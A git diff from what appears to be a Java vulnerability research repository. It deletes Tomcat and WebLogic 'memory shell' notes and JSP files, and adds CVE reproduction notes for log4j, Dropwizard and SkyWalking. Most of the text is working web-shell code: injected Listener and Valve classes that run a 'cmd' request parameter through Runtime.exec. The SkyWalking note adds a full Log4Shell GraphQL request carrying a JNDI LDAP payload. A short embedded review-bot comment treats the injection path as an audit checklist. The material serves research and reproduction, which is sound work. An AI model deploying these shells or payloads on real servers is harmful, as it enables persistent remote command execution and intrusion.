appctx.get(servletContext); -> Field stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); -> ``` - -step3-调用addApplicationEventListener()动态添加Listener - -> ```java -> ListenerDemo SRL = new ListenerDemo(); -> standardContext.addApplicationEventListener(SRL); -> out.println("listener shell inject success"); -> ``` - -代码整合如下 - -> ```jsp -> <%@ page import="java.lang.reflect.Field" %> -> <%@ page import="org.apache.catalina.core.ApplicationContext" %> -> <%@ page import="org.apache.catalina.core.StandardContext" %> -> <%@ page import="java.io.IOException" %> -> 
<%@ page import="org.apache.catalina.connector.Request" %> -> <% -> class ListenerDemo implements ServletRequestListener { -> @Override -> public void requestInitialized(ServletRequestEvent sre) { -> HttpServletRequest req = (HttpServletRequest) sre.getServletRequest(); -> String cmd = sre.getServletRequest().getParameter("cmd"); -> try { -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream())); -> Field requestF = req.getClass().getDeclaredField("request"); -> requestF.setAccessible(true); -> Request request = (Request) requestF.get(req); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> request.getResponse().getOutputStream().write(stringBuilder.toString().getBytes()); -> request.getResponse().getOutputStream().flush(); -> request.getResponse().getOutputStream().close(); -> } -> } catch (NoSuchFieldException | IllegalAccessException | IOException e) { -> e.printStackTrace(); -> } -> } -> -> @Override -> public void requestDestroyed(ServletRequestEvent sre) { -> -> } -> } -> %> -> <% -> ServletContext servletContext = request.getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -> Field stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); -> ListenerDemo SRL = new ListenerDemo(); -> standardContext.addApplicationEventListener(SRL); -> out.println("listener shell inject success"); -> %> -> ``` -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144616650-c6a9df8f-36ed-4063-9874-eb7a82b7a27c.png) 
- - -### Valve 内存马 - -Tomcat内部Valve组件,与Filter, Interceptor这些概念类似.只不过Valve是针对Tomcat内部的,而Filter是Servlet的标准, Interceptor是基于框架层次上的.但是它们的工作方式都是一种责任链的传递来拦截Request, Response,然后进行自定义的处理。所以这里的valve型内存马也和之前的差不多,自定义一个含有恶意代码处理逻辑的valve接口的实现或valve接口实现类的继承,然后通过tomcat自带的机制添加即可。 - -#### 静态添加 valve - -首先自定义可执行cmd的valve,实现Valve接口并重写其成员方法,核心代码块在invoke方法里 - -> EvilValve.java -> -> ```java -> package com.example.tomcat8; -> -> import org.apache.catalina.Valve; -> import org.apache.catalina.connector.Request; -> import org.apache.catalina.connector.Response; -> -> import javax.servlet.ServletException; -> import java.io.IOException; -> -> public class EvilValve implements Valve{ -> @Override -> public Valve getNext() { -> return null; -> } -> -> @Override -> public void setNext(Valve valve) { -> -> } -> -> @Override -> public void backgroundProcess() { -> -> } -> -> @Override -> public void invoke(Request request, Response response) throws IOException, ServletException { -> String cmd = request.getParameter("cmd"); -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader( -> new java.io.InputStreamReader(process.getInputStream()) -> ); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> response.getOutputStream().write(stringBuilder.toString().getBytes()); -> response.getOutputStream().flush(); -> response.getOutputStream().close(); -> getNext().invoke(request, response); -> }else { -> getNext().invoke(request, response); -> } -> } -> -> @Override -> public boolean isAsyncSupported() { -> return false; -> } -> } -> ``` - - - - -E:\Tomcat\apache-tomcat-8.5.70\conf\server.xml - -> ```xml -> -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144636239-f0758eb1-7698-44ba-92fe-cd7c2cd575f8.png) - - -测试失败-报错如下 - - 卡了很久没能解决,放弃 - - 
-![image](https://user-images.githubusercontent.com/55024146/144635943-a7fd98c0-ea60-4fe9-874d-d40e5f41caa7.png) - -#### 动态添加 valve - -- org.apache.catalina.core.ContainerBase#addValve - - -![image](https://user-images.githubusercontent.com/55024146/144636017-6411e9c5-0e51-43e0-b989-27889acc3a1e.png) - -- org.apache.catalina.core.ContainerBase#pipeline - - -![image](https://user-images.githubusercontent.com/55024146/144636054-a6a6d624-038e-48aa-8f50-dc54cd3b445f.png) - -- org.apache.catalina.core.ContainerBase#getPipeline - -![image](https://user-images.githubusercontent.com/55024146/144636096-27ca076f-0b72-4b5b-bf78-ee75d3934157.png) - - -捋清思路 - -- 自定义valve -> 实现valve接口,重写invoke方法 -- 添加valve -> this.pipeline.addValve(valve) -- 获取this.pipeline -> ContainerBase#getPipeline -- 调用getPipeline -> 继承ContainerBase类 -- ContainerBase类 -> `public class StandardContext extends ContainerBase implements...` -- 获取StandardContext - -代码实现 - -```java -ServletContext servletContext = request.getSession().getServletContext(); -Field appctx = servletContext.getClass().getDeclaredField("context"); -appctx.setAccessible(true); -ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -Field stdctx = applicationContext.getClass().getDeclaredField("context"); -stdctx.setAccessible(true); -StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); -standardContext.getPipeline().addValve(evilValve); -``` - -代码整合如下 - -> ```jsp -> <%@ page import="java.io.IOException" %> -> <%@ page import="java.lang.reflect.Field" %> -> <%@ page import="org.apache.catalina.core.ApplicationContext" %> -> <%@ page import="org.apache.catalina.core.StandardContext" %> -> <%@ page import="org.apache.catalina.connector.Request" %> -> <%@ page import="org.apache.catalina.connector.Response" %> -> <%@ page import="org.apache.catalina.Valve" %> -> <%@ page contentType="text/html;charset=UTF-8" language="java" %> -> <% -> class EvilValve implements Valve { -> 
@Override -> public Valve getNext() { -> return null; -> } -> @Override -> public void setNext(Valve valve) { -> -> } -> @Override -> public void backgroundProcess() { -> -> } -> @Override -> public void invoke(Request request, Response response) throws IOException, ServletException { -> String cmd = request.getParameter("cmd"); -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader( -> new java.io.InputStreamReader(process.getInputStream()) -> ); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> response.getOutputStream().write(stringBuilder.toString().getBytes()); -> response.getOutputStream().flush(); -> response.getOutputStream().close(); -> getNext().invoke(request, response); -> }else { -> getNext().invoke(request, response); -> } -> } -> @Override -> public boolean isAsyncSupported() { -> return false; -> } -> } -> %> -> -> <% -> /** -> * 已测试:tomcat8 -> */ -> try{ -> ServletContext servletContext = request.getSession().getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -> Field stdctx; -> stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext; -> standardContext = (StandardContext) stdctx.get(applicationContext); -> Valve evilValve = new EvilValve(); -> standardContext.getPipeline().addValve(evilValve); -> out.println("valve shell inject success"); -> } catch (NoSuchFieldException | IllegalAccessException e) { -> e.printStackTrace(); -> } -> %> -> ``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144636520-2d377082-7756-4214-94bb-7dfad4383258.png) - - - - - - - 
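Review bot: the deletion of fileless-shell/tomcat/README.md removes the only recorded negative result in this tree (the "静态添加 valve" section documents that registering `EvilValve` through `conf/server.xml` on apache-tomcat-8.5.70 failed, with an empty `xml` fence where the configuration was meant to go and "卡了很久没能解决,放弃" as the conclusion) without the commit saying whether the Tomcat notes are being relocated or dropped; if relocated, reference the new path, and keep the failure note, since it saves the next reader the same dead end. The part of this file a defender actually needs is the injection path it spells out in "捋清思路": reflection from `ServletContext` via the private `context` field to `ApplicationContext`, again to `StandardContext`, then `addApplicationEventListener` or `getPipeline().addValve`; that list is exactly what a memory-shell audit has to enumerate (application event listeners and pipeline valves on `StandardContext` whose classes were not loaded from the deployed webapp), so it is worth preserving as a checklist rather than losing with the file.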
diff --git a/fileless-shell/tomcat/addListener.jsp b/fileless-shell/tomcat/addListener.jsp deleted file mode 100644 index 4c450905..00000000 --- a/fileless-shell/tomcat/addListener.jsp +++ /dev/null 
@@ -1,55 +0,0 @@ -<%@ page contentType="text/html;charset=UTF-8" language="java" %> -<%@ page import="org.apache.catalina.core.ApplicationContext" %> -<%@ page import="org.apache.catalina.core.StandardContext" %> -<%@ page import="javax.servlet.*" %> -<%@ page import="java.io.IOException" %> -<%@ page import="java.lang.reflect.Field" %> -<%@ page import="java.io.InputStream" %> -<%@ page import="org.apache.catalina.connector.Request" %> -<%@ page import="java.util.Scanner" %> - -<% - class SRL implements ServletRequestListener{ - @Override - public void requestDestroyed(ServletRequestEvent servletRequestEvent) { - - } - @Override - public void requestInitialized(ServletRequestEvent sre) { - try { - InputStream in = java.lang.Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", sre.getServletRequest().getParameter("cmd")}).getInputStream(); - // getField和getDeclaredField都是Class类的方法,反射成员变量时使用,这里返回一個Field對象 - // getDeclaredFiled 仅能获取类本身的属性成员(包括私有、共有、保护) - // getField 仅能获取类 public属性成员 - Field requestF = sre.getServletRequest().getClass().getDeclaredField("request"); - // 成员变量为private,必须进行此操作。 - // accessible 标志被设置为true,那么反射对象在使用的时候,不会去检查Java语言权限控制(private之类的); - // 如果设置为false,反射对象在使用的时候,会检查Java语言权限控制。 - requestF.setAccessible(true); - Request request = (Request)requestF.get(sre.getServletRequest()); - Scanner s = new Scanner( in ).useDelimiter("\\a"); - String o = s.hasNext() ? 
s.next() : ""; - request.getResponse().getWriter().write(o); - request.getResponse().getWriter().flush(); - request.getResponse().getWriter().close(); - } catch (IOException | IllegalAccessException | NoSuchFieldException e) { - e.printStackTrace(); - } - } - } -%> - -<% - // 通过反射获取获取context部分 - ServletContext servletContext = request.getSession().getServletContext(); - Field appctx = servletContext.getClass().getDeclaredField("context"); - appctx.setAccessible(true); - ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); - Field stdctx = applicationContext.getClass().getDeclaredField("context"); - stdctx.setAccessible(true); - StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); - // 添加Listener - SRL servletRequestListener = new SRL(); - standardContext.addApplicationEventListener(servletRequestListener); - out.println("listener shell inject success"); -%> \ No newline at end of file diff --git a/fileless-shell/tomcat/addValve.jsp b/fileless-shell/tomcat/addValve.jsp deleted file mode 100644 index 359d48d3..00000000 --- a/fileless-shell/tomcat/addValve.jsp +++ /dev/null 
@@ -1,71 +0,0 @@ -<%@ page import="java.io.IOException" %> -<%@ page import="java.lang.reflect.Field" %> -<%@ page import="org.apache.catalina.core.ApplicationContext" %> -<%@ page import="org.apache.catalina.core.StandardContext" %> -<%@ page import="org.apache.catalina.connector.Request" %> -<%@ page import="org.apache.catalina.connector.Response" %> -<%@ page import="org.apache.catalina.Valve" %> -<%@ page contentType="text/html;charset=UTF-8" language="java" %> -<% - class EvilValve implements Valve { - @Override - public Valve getNext() { - return null; - } - @Override - public void setNext(Valve valve) { - - } - @Override - public void backgroundProcess() { - - } - @Override - public void invoke(Request request, Response response) throws IOException, ServletException { - String cmd = request.getParameter("cmd"); - if (cmd != null) { - Process process = Runtime.getRuntime().exec(cmd); - java.io.BufferedReader bufferedReader = new java.io.BufferedReader( - new java.io.InputStreamReader(process.getInputStream()) - ); - StringBuilder stringBuilder = new StringBuilder(); - String line; - while ((line = bufferedReader.readLine()) != null) { - stringBuilder.append(line + '\n'); - } - response.getOutputStream().write(stringBuilder.toString().getBytes()); - response.getOutputStream().flush(); - response.getOutputStream().close(); - getNext().invoke(request, response); - }else { - getNext().invoke(request, response); - } - } - @Override - public boolean isAsyncSupported() { - return false; - } - } -%> - -<% - /** - * 已测试:tomcat8 - */ - try{ - ServletContext servletContext = request.getSession().getServletContext(); - Field appctx = servletContext.getClass().getDeclaredField("context"); - appctx.setAccessible(true); - ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); - Field stdctx; - stdctx = applicationContext.getClass().getDeclaredField("context"); - stdctx.setAccessible(true); - StandardContext standardContext; - 
standardContext = (StandardContext) stdctx.get(applicationContext); - Valve evilValve = new EvilValve(); - standardContext.getPipeline().addValve(evilValve); - out.println("valve shell inject success"); - } catch (NoSuchFieldException | IllegalAccessException e) { - e.printStackTrace(); - } -%> \ No newline at end of file diff --git a/fileless-shell/weblogic/README.md b/fileless-shell/weblogic/README.md deleted file mode 100644 index 43138e8d..00000000 --- a/fileless-shell/weblogic/README.md +++ /dev/null 
@@ -1,106 +0,0 @@ -**目录** -- 获取上下文 WebAppServletContext -- 动态注册Servlet内存马 -- 动态注册Listener内存马 -- 动态注册Filter内存马 - -> 已测试10.3.6.0、12.1.3.0.0 - - -### 获取上下文 WebAppServletContext - -- WebAppServletContext - -```java -Class executeThread = Class.forName("weblogic.work.ExecuteThread"); -Method getCurrentWork = executeThread.getDeclaredMethod("getCurrentWork"); -Object currentWork = getCurrentWork.invoke(Thread.currentThread()); -WebAppServletContext webAppServletContext; -try { - // weblogic 12.1.3 - Field connectionHandler = currentWork.getClass().getDeclaredField("connectionHandler"); - connectionHandler.setAccessible(true); - Object httpConnectionHandler = connectionHandler.get(currentWork); - Field requestF = httpConnectionHandler.getClass().getDeclaredField("request"); - requestF.setAccessible(true); - httpConnectionHandler = requestF.get(httpConnectionHandler); - java.lang.reflect.Field contextF = httpConnectionHandler.getClass().getDeclaredField("context"); - contextF.setAccessible(true); - webAppServletContext = (WebAppServletContext) contextF.get(httpConnectionHandler); -} catch (Exception e) { - // weblogic 1036 - Field contextF = currentWork.getClass().getDeclaredField("context"); - contextF.setAccessible(true); - webAppServletContext = (WebAppServletContext) contextF.get(currentWork); -} -``` - -### 动态注册Servlet内存马 - -跟了一下从web.xml添加servet的流程,可以使用registerServlet方法注册Servlet,不过不同版本的weblogic对该方法有不同实现: - -#### 10.3.6.0 -![image](https://user-images.githubusercontent.com/55024146/143993515-f149070e-9ea0-487b-8dbf-fcb8f1682fcd.png) - - -成员方法 -- weblogic.servlet.internal.WebAppServletContext#registerServlet() - -![image](https://user-images.githubusercontent.com/55024146/143996030-4614d0d7-e77f-47e6-8540-ec40f41dc296.png) - - - -反射调用 -```java -Method registerServlet = webAppServletContext.getClass().getDeclaredMethod("registerServlet", String.class, String.class, String.class, Map.class); -registerServlet.setAccessible(true); -HashMap hashMap = new HashMap(); 
-registerServlet.invoke(webAppServletContext, "TestServlet", "/abcd", servletClass.getName(), hashMap); -``` -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/143996228-773c6cf8-c801-4068-bcd9-8ce03e016de2.png) - - -#### 12.1.3.0.0 - -成员方法 -- weblogic.servlet.internal.WebAppServletContext#registerServlet() -![image](https://user-images.githubusercontent.com/55024146/143996176-db4ea7f0-568b-492e-b20a-07ef8727f29c.png) - - -同样的,反射调用 - -```java -Method registerServlet = webAppServletContext.getClass().getDeclaredMethod("registerServlet", String.class, String.class, String.class); -registerServlet.setAccessible(true); -registerServlet.invoke(webAppServletContext, "TestServlet", "/121300", servletClass.getName()); -response.getWriter().write("Servlet Injected Successfully!!!"); -``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/143996258-5aef7689-b745-4273-95b8-e2f74776bb01.png) - - - -### 动态注册Listener内存马 - - -### 动态注册Filter内存马 - -#### 10.3.6.0 - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144036760-4c29b12c-2b28-4270-a82b-7c812e2f7922.png) - - - -#### 12.1.3.0.0 - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144036974-997a4c40-c302-4c21-8770-e8581b6a9104.png) - - diff --git a/framework/log/log4j1/CVE-2019-17571.md b/framework/log/log4j1/CVE-2019-17571.md new file mode 100644 index 00000000..f7bc18cd --- /dev/null +++ b/framework/log/log4j1/CVE-2019-17571.md @@ -0,0 +1,14 @@ +**漏洞分析** + +SimpleSocketServer若开启了xxxx端口,会对socket接收的数据进行反序列化操作 + +![image](https://user-images.githubusercontent.com/55024146/165814421-f6762915-25bc-4f59-b7d3-86d606e84373.png) + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/165814599-c09f968b-c9aa-4719-ab2a-12ed283049c6.png) + +**漏洞验证** + +![image](https://user-images.githubusercontent.com/55024146/165814894-ebe9a146-8d59-4912-a059-00acb21f570e.png) + 
diff --git a/framework/log/log4j1/CVE-2022-23307.md b/framework/log/log4j1/CVE-2022-23307.md new file mode 100644 index 00000000..fe6ef724 --- /dev/null +++ b/framework/log/log4j1/CVE-2022-23307.md @@ -0,0 +1,14 @@ +**漏洞分析** + +设置监听端口 + +![image](https://user-images.githubusercontent.com/55024146/165812050-49b13eb6-d3b7-47b3-9ca3-906c19891226.png) + +然后使用 LoggingReceiver 处理相关连接信息,反序列化ois对象时触发漏洞 + +![image](https://user-images.githubusercontent.com/55024146/165812417-bc91774f-4916-42e6-89e0-bf1e6959870c.png) + + +**漏洞验证** + +![image](https://user-images.githubusercontent.com/55024146/165812930-73c69adf-7dab-4556-b894-cc64fe056818.png) diff --git a/framework/log/log4j1/README.md b/framework/log/log4j1/README.md new file mode 100644 index 00000000..6d9d7869 --- /dev/null +++ b/framework/log/log4j1/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] [CVE-2019-17571 SocketServer RCE](CVE-2019-17571.md) +- [x] [CVE-2022-23307 Chainsaw RCE](CVE-2022-23307.md) + diff --git a/framework/log/log4j2/CVE-2021-44228.md b/framework/log/log4j2/CVE-2021-44228.md new file mode 100644 index 00000000..c40a2642 --- /dev/null +++ b/framework/log/log4j2/CVE-2021-44228.md @@ -0,0 +1,11 @@ +### CVE-2021-44228 Log4Shell + +漏洞复现 + +起一个恶意的LDAPRefServer、恶意类Evil + +![image](https://user-images.githubusercontent.com/55024146/165895658-d4eea680-015a-411f-96c7-2384fa08d462.png) + +然后触发即可 + +![image](https://user-images.githubusercontent.com/55024146/165895677-ab26a7bb-69a3-4504-9156-7aade555ea07.png) diff --git a/framework/log/log4j2/README.md b/framework/log/log4j2/README.md new file mode 100644 index 00000000..e32b54bb --- /dev/null +++ b/framework/log/log4j2/README.md @@ -0,0 +1,3 @@ +历史漏洞 + +- [x] [CVE-2021-44228 JNDI -> RCE](CVE-2021-44228.md) \ No newline at end of file diff --git "a/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..b48e1610 
--- /dev/null +++ "b/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,2 @@ + +- https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug diff --git a/framework/microservice/dropwizard/README.md b/framework/microservice/dropwizard/README.md new file mode 100644 index 00000000..df2ad99a --- /dev/null +++ b/framework/microservice/dropwizard/README.md @@ -0,0 +1,26 @@ +Dropwizard self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to RCE vulnerability. + +vulnerable code snippet +```java +// com.example.helloworld.core.Person#validateFullName + +@SelfValidation +public void validateFullName(ViolationCollector col) { + if (fullName.contains("$")) { + col.addViolation("Full name contains invalid characters: " + fullName); + } +} + +// io.dropwizard.validation.selfvalidating.ViolationCollector#addViolation +public void addViolation(String msg) { + this.violationOccurred = true; + this.context.buildConstraintViolationWithTemplate(msg).addConstraintViolation(); +} + +``` + + +issue reproduction + + +image diff --git a/framework/microservice/flink/README.md b/framework/microservice/flink/README.md new file mode 100644 index 00000000..62a5f718 --- /dev/null +++ b/framework/microservice/flink/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] [CVE-2020-17518 文件上传](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg) +- [x] [CVE-2020-17519 文件读取](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg) + diff --git a/framework/microservice/jenkins/README.md b/framework/microservice/jenkins/README.md new file mode 100644 index 00000000..ac086451 --- /dev/null +++ b/framework/microservice/jenkins/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2015-8103 反序列化 -> RCE + +- https://mp.weixin.qq.com/s/g91wUz8QaOz7qvQodIO5UQ diff --git a/framework/microservice/shenyu/README.md b/framework/microservice/shenyu/README.md new file mode 100644 index 00000000..eb953af2 --- /dev/null +++ b/framework/microservice/shenyu/README.md 
@@ -0,0 +1,11 @@ +相关漏洞 +--- + +### CVE-2021-45029 Groovy & SpEL Injection + +- https://mp.weixin.qq.com/s/SdNLthm5Ll3SnRhO0dGGgA + +### CVE-2021-37580 Auth bypass + +- https://mp.weixin.qq.com/s/LwpXJPFIjZkwXcMl8KU2fw + diff --git a/framework/microservice/skywalking/README.md b/framework/microservice/skywalking/README.md new file mode 100644 index 00000000..1fdaccce --- /dev/null +++ b/framework/microservice/skywalking/README.md 
@@ -0,0 +1,242 @@ +## 相关漏洞 + +### CVE-2021-44228 RCE via Log4Shell + +#### 漏洞描述 + +#### 漏洞复现 + +##### 环境搭建 + +- https://www.apache.org/dyn/closer.cgi/skywalking/8.3.0/apache-skywalking-apm-8.3.0.tar.gz + +下载后 + +``` +./sudo ./startup.sh +``` + +![image-20220113144942928](skywalking.assets/image-20220113144942928.png) + +如图 + +![image-20220113145030966](skywalking.assets/image-20220113145030966.png) + +注:内置中间件 + +- Powered by Jetty:// 9.4.28.v20200408 + +##### 漏洞验证 + +###### DNSLog + +proof of concept + +```shell +POST /graphql HTTP/1.1 +Host: 10.10.10.139:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/json;charset=utf-8 +Content-Length: 444 +Origin: http://10.10.10.139:8080 +DNT: 1 +Connection: close +Referer: http://10.10.10.139:8080/ + +{ + "query":"query queryLogs($condition: LogQueryCondition) { + queryLogs(condition: $condition) { + total + logs { + serviceId + ${jndi:ldap://craq3a.dnslog.cn} + serviceName + isError + content + } + } +} +", + "variables":{ + "condition":{ + "metricName":"test", + "state":"ALL", + "paging":{ + "pageSize":10 + } + } + } +} +``` + + + +![image-20220113144532353](skywalking.assets/image-20220113144532353.png) + +###### 命令执行 + +![image-20220113155050988](skywalking.assets/image-20220113155050988.png) + +###### Reverse Shell + +![image-20220114152004486](skywalking.assets/image-20220114152004486.png) + +#### 漏洞分析 + +- 调试模式 + +- https://www.jianshu.com/p/e70fe8717abf + + +**log4shell-source** + +- org.apache.skywalking.oap.query.graphql.GraphQLQueryHandler#doPost + +![image-20220114140427507](skywalking.assets/image-20220114140427507.png) + + + +**log4shell-sink** + +- graphql.GraphQL#parseAndValidate + - org.slf4j.Logger#warn(java.lang.String, java.lang.Object) + 
+![image-20220114133448365](skywalking.assets/image-20220114133448365.png) + + + +调用栈 + +```java +parseAndValidate:507, GraphQL (graphql) +lambda$parseValidateAndExecute3ドル:494, GraphQL (graphql) +apply:-1, 361099866 (graphql.GraphQL$$Lambda138ドル) +get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed) +parseValidateAndExecute:490, GraphQL (graphql) +executeAsync:470, GraphQL (graphql) +execute:401, GraphQL (graphql) +execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:707, HttpServlet (javax.servlet.http) +service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:790, HttpServlet (javax.servlet.http) +service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +handle:763, ServletHolder (org.eclipse.jetty.servlet) +doHandle:551, ServletHandler (org.eclipse.jetty.servlet) +nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler) +doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler) +nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:489, ServletHandler (org.eclipse.jetty.servlet) +nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:1278, ContextHandler (org.eclipse.jetty.server.handler) +handle:141, ScopedHandler (org.eclipse.jetty.server.handler) +handle:127, HandlerWrapper (org.eclipse.jetty.server.handler) +handle:500, Server (org.eclipse.jetty.server) +lambda$handle1ドル:383, HttpChannel (org.eclipse.jetty.server) +dispatch:-1, 878842527 (org.eclipse.jetty.server.HttpChannel$$Lambda127ドル) +dispatch:547, HttpChannel (org.eclipse.jetty.server) +handle:375, HttpChannel (org.eclipse.jetty.server) +onFillable:273, HttpConnection (org.eclipse.jetty.server) +succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io) +fillable:103, 
FillInterest (org.eclipse.jetty.io) +run:117, ChannelEndPoint2ドル (org.eclipse.jetty.io) +runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread) +run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread) +run:745, Thread (java.lang) +``` + + + +**jndi-sink** + +- javax.naming.spi.NamingManager#getObjectFactoryFromReference + +![image-20220114144223966](skywalking.assets/image-20220114144223966.png) + +调用栈 + +```java +# 执行无参构造方法 & 静态代码块 +newInstance:396, Class (java.lang) +getObjectFactoryFromReference:163, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +lookup:172, JndiManager (org.apache.logging.log4j.core.net) +lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup) +lookup:183, Interpolator (org.apache.logging.log4j.core.lookup) +resolveVariable:1054, StrSubstitutor (org.apache.logging.log4j.core.lookup) +substitute:976, StrSubstitutor (org.apache.logging.log4j.core.lookup) +substitute:872, StrSubstitutor (org.apache.logging.log4j.core.lookup) +replace:427, StrSubstitutor (org.apache.logging.log4j.core.lookup) +format:127, MessagePatternConverter (org.apache.logging.log4j.core.pattern) +format:38, PatternFormatter (org.apache.logging.log4j.core.pattern) +toSerializable:333, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout) +toText:232, PatternLayout (org.apache.logging.log4j.core.layout) +encode:217, PatternLayout (org.apache.logging.log4j.core.layout) +encode:57, PatternLayout (org.apache.logging.log4j.core.layout) +directEncodeEvent:177, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) +tryAppend:170, AbstractOutputStreamAppender 
(org.apache.logging.log4j.core.appender) +append:161, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) +append:308, RollingFileAppender (org.apache.logging.log4j.core.appender) +tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config) +callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config) +callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config) +callAppender:84, AppenderControl (org.apache.logging.log4j.core.config) +callAppenders:448, LoggerConfig (org.apache.logging.log4j.core.config) +processLogEvent:433, LoggerConfig (org.apache.logging.log4j.core.config) +log:417, LoggerConfig (org.apache.logging.log4j.core.config) +log:403, LoggerConfig (org.apache.logging.log4j.core.config) +log:63, AwaitCompletionReliabilityStrategy (org.apache.logging.log4j.core.config) +logMessage:146, Logger (org.apache.logging.log4j.core) +tryLogMessage:2116, AbstractLogger (org.apache.logging.log4j.spi) +logMessageSafely:2100, AbstractLogger (org.apache.logging.log4j.spi) +logMessage:2011, AbstractLogger (org.apache.logging.log4j.spi) +logIfEnabled:1882, AbstractLogger (org.apache.logging.log4j.spi) +warn:244, Log4jLogger (org.apache.logging.slf4j) +parseAndValidate:507, GraphQL (graphql) +lambda$parseValidateAndExecute3ドル:494, GraphQL (graphql) +apply:-1, 361099866 (graphql.GraphQL$$Lambda138ドル) +get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed) +parseValidateAndExecute:490, GraphQL (graphql) +executeAsync:470, GraphQL (graphql) +execute:401, GraphQL (graphql) +execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:707, HttpServlet (javax.servlet.http) +service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:790, HttpServlet (javax.servlet.http) 
